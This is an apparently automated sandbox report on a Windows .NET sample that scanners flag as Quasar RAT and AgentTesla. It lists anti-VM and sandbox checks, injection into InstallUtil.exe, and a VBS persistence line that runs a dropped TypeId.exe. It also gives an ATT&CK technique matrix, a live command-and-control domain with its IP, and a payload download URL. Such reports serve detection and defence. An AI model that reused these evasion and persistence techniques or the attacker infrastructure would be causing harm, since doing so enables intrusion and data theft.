                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: ________.exe PID: 1812, type: MEMORYSTR
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: ________.exe, 00000000.00000002.2157230652.0000000002A04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QCCOULD NOT FIND FILE 'C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE'.
                Source: ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Q,C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE8
                Source: ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: ________.exe, 00000000.00000002.2157230652.0000000002A04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Q,C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE
                Source: ________.exe, 00000000.00000002.2157230652.0000000002A04000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TYPEID.EXE
                Source: ________.exe, 00000000.00000002.2157230652.0000000002A04000.00000004.00000800.00020000.00000000.sdmp, TypeId.vbs.0.drBinary or memory string: CREATEOBJECT("WSCRIPT.SHELL").RUN """C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"""
                Source: ________.exe, 00000000.00000002.2157230652.0000000002A04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QTCREATEOBJECT("WSCRIPT.SHELL").RUN """C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"""
                Source: ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QTC:\WINDOWSFIND FILE 'C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE'.
                Source: C:\Users\user\Desktop\________.exeMemory allocated: AD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\________.exeMemory allocated: 2650000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\________.exeMemory allocated: BE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\________.exeMemory allocated: 7100000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\________.exeMemory allocated: 8100000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2840000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2840000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\________.exeWindow / User API: threadDelayed 2522Jump to behavior
                Source: C:\Users\user\Desktop\________.exeWindow / User API: threadDelayed 4262Jump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -21213755684765971s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 3532Thread sleep count: 2522 > 30Jump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -99891s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -99781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 3532Thread sleep count: 4262 > 30Jump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -99672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -99563s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -99438s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -99313s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -99188s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -99078s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -98961s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -98844s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -98734s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -98624s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -98508s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -98403s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -98292s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -98183s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -98055s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -97941s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -97807s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -97688s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -97578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -97469s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -97359s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -97250s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -97141s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -97031s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -96922s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -96813s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -96688s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exe TID: 2612Thread sleep time: -96578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 99891Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 99781Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 99672Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 99563Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 99438Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 99313Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 99188Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 99078Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 98961Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 98844Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 98734Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 98624Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 98508Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 98403Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 98292Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 98183Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 98055Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 97941Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 97807Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 97688Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 97578Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 97469Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 97359Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 97250Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 97141Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 97031Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 96922Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 96813Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 96688Jump to behavior
                Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 96578Jump to behavior
                Source: InstallUtil.exe, 00000002.00000002.3381204502.0000000005247000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrre
                Source: ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                Source: ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                Source: ________.exe, 00000000.00000002.2180060550.0000000005120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\________.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\________.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\________.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\Desktop\________.exeQueries volume information: C:\Users\user\Desktop\________.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\________.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Quasar RAT
                Source: Yara matchFile source: 0.2.________.exe.3c4bee0.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.________.exe.3c4bee0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2157230652.0000000002805000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3368690490.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3368690490.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2170154648.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2191390517.0000000007101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ________.exe PID: 1812, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6844, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Quasar RAT
                Source: Yara matchFile source: 0.2.________.exe.3c4bee0.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.________.exe.3c4bee0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2157230652.0000000002805000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3368690490.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3368690490.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2170154648.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2191390517.0000000007101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ________.exe PID: 1812, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6844, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		Valid Accounts1
                Scheduled Task/Job                		1
                Scripting                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping21
                Security Software Discovery                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		1
                Disable or Modify Tools                		LSASS Memory1
                Process Discovery                		Remote Desktop ProtocolData from Removable Media1
                Non-Standard Port                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt21
                Registry Run Keys / Startup Folder                		21
                Registry Run Keys / Startup Folder                		31
                Virtualization/Sandbox Evasion                		Security Account Manager31
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive1
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Hidden Files and Directories                		LSA Secrets12
                System Information Discovery                		SSHKeylogging13
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Obfuscated Files or Information                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Software Packing                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                ________.exe58%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                ________.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\TypeId.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\TypeId.exe58%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://dapper-plus.net0%Avira URL Cloudsafe
                https://bulk-operations.net0%Avira URL Cloudsafe
                https://www.oleonidas.gr/ewgrh/Rfbybifboaq.dat0%Avira URL Cloudsafe
                aboushagor.ydns.eu100%Avira URL Cloudmalware
                http://www.zzzprojects.com0%Avira URL Cloudsafe
                https://entityframework-extensions.net/md5-exceptionX0%Avira URL Cloudsafe
                https://www.oleonidas.gr0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                aboushagor.ydns.eu
                		155.94.209.8
                		truetrue
                  		unknown
                  oleonidas.gr
                  		185.78.221.73
                  		truefalse
                    		unknown
                    www.oleonidas.gr
                    		unknown
                    		unknownfalse
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://www.oleonidas.gr/ewgrh/Rfbybifboaq.datfalse
                      • Avira URL Cloud: safe
                      		unknown
                      aboushagor.ydns.eutrue
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/________.exe, 00000000.00000002.2191390517.0000000007101000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3368690490.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        		high
                        https://entityframework-extensions.net/md5-exception________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://bulk-operations.net________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://stackoverflow.com/q/14436606/23354________.exe, 00000000.00000002.2170154648.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2191390517.0000000007101000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2185351937.00000000066A0000.00000004.08000000.00040000.00000000.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3373655788.0000000002AED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3368690490.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            		high
                            https://dapper-plus.net/getting-started-mapping#instance-context-mapping.________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/mgravell/protobuf-netJ________.exe, 00000000.00000002.2170154648.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2185351937.00000000066A0000.00000004.08000000.00040000.00000000.sdmpfalse
                                		high
                                https://dapper-plus.net/pricing.________.exe, TypeId.exe.0.drfalse
                                  		high
                                  https://www.nuget.org/packages/NetTopologySuite.IO.SqlServerBytes/________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://github.com/mgravell/protobuf-net________.exe, 00000000.00000002.2170154648.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2185351937.00000000066A0000.00000004.08000000.00040000.00000000.sdmpfalse
                                      		high
                                      https://entityframework-extensions.net/)________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.zzzprojects.com________.exe, TypeId.exe.0.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://bulk-operations.net/pricing.________.exe, TypeId.exe.0.drfalse
                                          		high
                                          https://www.oleonidas.gr________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://entityframework-extensions.net/include-graph).________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://entityframework-extensions.net/pricing.________.exe, TypeId.exe.0.drfalse
                                              		high
                                              https://dapper-plus.net/getting-started-mapping#instance-context-mapping________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://linqtosql-plus.net/pricing.________.exe, TypeId.exe.0.drfalse
                                                  		high
